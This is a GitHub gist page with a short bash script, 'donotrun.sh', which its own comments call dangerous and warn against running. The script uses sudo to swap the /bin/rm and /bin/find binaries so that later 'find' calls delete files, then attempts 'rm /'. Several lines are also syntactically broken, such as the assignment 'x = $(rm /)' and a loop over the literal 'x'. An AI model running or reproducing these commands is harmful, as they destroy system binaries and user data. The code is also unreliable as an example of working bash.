Created
December 8, 2019 15:36
-
-
Save kj7rrv/8a30f944bbda1f036f4721a2c203b302 to your computer and use it in GitHub Desktop.
bash code you should never run (ever!)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
#donotrun.sh - do not run this | |
#this script is (c) 2019 ScoopGracie. All rights reserved. | |
#you are granted no permissions to do anything with this script. | |
#don't run it, modify it, redistribute it, or do anything else with it. | |
#i'm serious! don't use this script! it's dangerous! | |
sudo mv /bin/find . | |
sudo mv /bin/rm /bin/find | |
sudo mv . /bin/rm | |
x = $(rm /) | |
for i in x; do | |
find $i | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment